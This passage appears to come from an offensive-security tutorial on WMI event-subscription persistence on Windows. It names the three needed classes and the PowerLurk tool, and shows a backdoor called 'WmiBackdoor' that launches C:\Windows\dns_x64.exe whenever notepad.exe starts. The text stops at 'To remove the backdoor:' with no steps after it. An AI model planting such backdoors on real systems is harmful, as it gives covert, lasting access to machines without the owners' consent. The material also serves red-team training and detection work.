Requirements
High integrity or SYSTEM
In order to maintain persistence through WMI, we need three classes:
EventConsumer
: An action (i.e. execute payload—PowerShell, VBScript, etc)EventFilter
: A filter that defines what event to act onFilterToConsumerBinding
: Links an EventConsumer to EventFilter
We can build these WMI classes uses PowerLurk.
Demonstration
You can view these classes afterwards using
Get-WmiEvent -Name WmiBackdoor
. TheCommandLineTemplate
for theEventConsumer
will simply beC:\Windows\dns_x64.exe
; and query for the EventFilter will beSELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'
.
To remove the backdoor: